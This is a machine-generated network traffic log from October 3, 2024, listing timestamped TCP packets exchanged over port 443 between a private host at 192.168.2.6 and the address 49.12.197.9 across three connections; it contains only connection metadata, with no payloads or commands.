                                                                                                                                                      Oct 3, 2024 09:16:27.437644958 CEST49735443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:27.437679052 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:28.113333941 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:28.113677025 CEST49735443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:28.114113092 CEST49735443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:28.114130974 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:28.118488073 CEST49735443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:28.118510962 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:28.545761108 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:28.545797110 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:28.545818090 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:28.546135902 CEST49735443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:28.546135902 CEST49735443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:28.546149969 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:28.546267986 CEST49735443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:28.576339006 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:28.576389074 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:28.576519012 CEST49735443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:28.576519012 CEST49735443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:28.576539993 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:28.576654911 CEST49735443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:28.643889904 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:28.643929005 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:28.644429922 CEST49735443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:28.644449949 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:28.645152092 CEST49735443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:28.673501968 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:28.673544884 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:28.673718929 CEST49735443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:28.673743010 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:28.673965931 CEST49735443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:28.713886976 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:28.713927984 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:28.714098930 CEST49735443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:28.714137077 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:28.714394093 CEST49735443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:28.740370035 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:28.740406036 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:28.740665913 CEST49735443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:28.740674973 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:28.740972042 CEST49735443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:28.763734102 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:28.763770103 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:28.765243053 CEST49735443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:28.765250921 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:28.765399933 CEST49735443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:28.778326035 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:28.778362036 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:28.778471947 CEST49735443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:28.778471947 CEST49735443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:28.778491020 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:28.779481888 CEST49735443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:28.796171904 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:28.796204090 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:28.799485922 CEST49735443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:28.799504995 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:28.803481102 CEST49735443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:28.825073004 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:28.825103045 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:28.825303078 CEST49735443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:28.825311899 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:28.825467110 CEST49735443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:28.830554008 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:28.830599070 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:28.831018925 CEST49735443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:28.831031084 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:28.831094027 CEST49735443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:28.844048977 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:28.844074011 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:28.844921112 CEST49735443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:28.844930887 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:28.845519066 CEST49735443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:28.858891964 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:28.858918905 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:28.859405041 CEST49735443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:28.859416962 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:28.861521959 CEST49735443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:28.868918896 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:28.868943930 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:28.869246960 CEST49735443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:28.869257927 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:28.869311094 CEST49735443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:28.879087925 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:28.879122019 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:28.879432917 CEST49735443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:28.879445076 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:28.881565094 CEST49735443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:28.885710001 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:28.885781050 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:28.885823011 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:28.885970116 CEST49735443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:28.885970116 CEST49735443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:28.887083054 CEST49735443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:28.887101889 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:28.887604952 CEST49736443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:28.887655973 CEST4434973649.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:28.887744904 CEST49736443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:28.888042927 CEST49736443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:28.888057947 CEST4434973649.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:29.539231062 CEST4434973649.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:29.539541960 CEST49736443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:29.540194988 CEST49736443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:29.540208101 CEST4434973649.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:29.542162895 CEST49736443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:29.542186022 CEST4434973649.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:29.965317965 CEST4434973649.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:29.965352058 CEST4434973649.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:29.965375900 CEST4434973649.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:29.965523005 CEST49736443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:29.965553999 CEST4434973649.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:29.965600967 CEST49736443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:29.996195078 CEST4434973649.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:29.996227026 CEST4434973649.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:29.996411085 CEST49736443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:29.996426105 CEST4434973649.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:29.996467113 CEST49736443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:30.063376904 CEST4434973649.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:30.063431978 CEST4434973649.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:30.063615084 CEST49736443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:30.063637018 CEST4434973649.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:30.063683033 CEST49736443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:30.093310118 CEST4434973649.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:30.093367100 CEST4434973649.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:30.093425989 CEST49736443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:30.093466043 CEST4434973649.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:30.093499899 CEST49736443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:30.093519926 CEST49736443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:30.131019115 CEST4434973649.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:30.131091118 CEST4434973649.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:30.131216049 CEST4434973649.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:30.131221056 CEST49736443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:30.131289005 CEST49736443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:30.131990910 CEST49736443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:30.132008076 CEST4434973649.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:30.133095980 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:30.133136034 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:30.133227110 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:30.133498907 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:30.133508921 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:30.799237967 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:30.799417019 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:30.800071001 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:30.800084114 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:30.801991940 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:30.801996946 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.236133099 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.236202002 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.236248016 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.236294985 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.236351967 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.236367941 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.236414909 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.267007113 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.267033100 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.267079115 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.267096996 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.267139912 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.267164946 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.334081888 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.334148884 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.334310055 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.334336996 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.334413052 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.359880924 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.359904051 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.359997034 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.360016108 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.360079050 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.360079050 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.395240068 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.395279884 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.395418882 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.395437002 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.395488024 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.421514034 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.421541929 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.421945095 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.421962023 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.422082901 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.449157953 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.449187040 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.449357033 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.449389935 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.449440002 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.463790894 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.463819981 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.464042902 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.464082956 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.464543104 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.481326103 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.481348038 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.481460094 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.481492996 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.481801987 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.497303963 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.497323036 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.497416019 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.497440100 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.498002052 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.509768963 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.509789944 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.510101080 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.510113001 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.510652065 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.525665998 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.525691032 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.526475906 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.526489973 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.526988983 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.542464972 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.542490959 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.542598963 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.542627096 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.542674065 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.550278902 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.550296068 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.550359011 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.550368071 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.551415920 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.560970068 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.560988903 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.561444998 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.561476946 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.561533928 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.569147110 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.569164038 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.569608927 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.569638968 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.569719076 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.579997063 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.580014944 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.580255985 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.580286980 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.580682993 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.587996006 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.588017941 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.588277102 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.588325977 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.588483095 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.597980976 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.598000050 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.598104954 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.598140001 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.598197937 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.610793114 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.610819101 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.611409903 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.611438990 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.611512899 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.622840881 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.622864008 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.622977972 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.623017073 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.623157978 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.636780024 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.636807919 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.636971951 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.637008905 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.637132883 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.646756887 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.646780014 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.646929026 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.646965981 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.647010088 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.657351971 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.657380104 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.657546043 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.657586098 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.657666922 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.666759968 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.666816950 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.667145014 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.667165041 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.667243004 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.673867941 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.673887968 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.674110889 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.674135923 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.674557924 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.688736916 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.688760996 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.689203024 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.689224958 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.690253973 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.701292992 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.701318979 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.701394081 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.701412916 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.701452971 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.720459938 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.720483065 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.720549107 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.720571041 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.720599890 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.720807076 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.733846903 CEST4434973749.12.197.9192.168.2.6
